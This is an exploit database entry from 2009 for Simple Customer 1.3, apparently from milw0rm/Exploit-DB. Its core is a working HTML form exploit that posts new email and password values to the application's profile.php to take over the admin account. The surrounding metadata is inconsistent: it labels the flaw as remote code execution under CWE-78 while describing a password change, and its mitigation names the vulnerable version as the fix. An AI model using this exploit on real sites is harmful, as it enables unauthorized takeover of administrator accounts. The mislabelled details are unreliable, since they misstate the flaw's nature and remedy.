vendor: Simple Customer 1.3
by: ahmadbady
CVSS: 9.3 HIGH
Remote Code Execution
CWE: 78
Product Name: Simple Customer 1.3
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:simple_customer:simple_customer:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Remote Change admin Password

A vulnerability in Simple Customer 1.3 allows an attacker to remotely change the admin password by sending a maliciously crafted POST request to the profile.php page. This can be exploited to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of Simple Customer 1.3

Exploit-DB raw data:

                 ---- Remote Change admin Password----
----------------------------
script:Simple Customer 1.3
----------------------------
Author: ahmadbady
email:kivi_hacker666@yahoo.com

--------------------
download from:http://www.simplecustomer.com/  New (Version 1.3)

--------------------
xpl:



</head>
<body>
<form action="http://www.simplecustomer.com/demo/profile.php" method="post">
<div class="container">
  <div class="leftcolumn">
    <h2>coded by ahmadbady</h2>
    </span>
    <form id="form1" name="form1" method="post" action="">
      <p>Email
        <br />
        <input name="email" type="text" id="email" value="" class="required validate-email" size="35" />
      </p>
      <p><br />
        <input name="password" type="password" id="password" />
          <br />
      </p>
      <p>Home Page<br />
        <input name="Submit2" type="submit" id="Submit2" value="Update" /> 
        </p>
    </form>

# milw0rm.com [2009-05-07]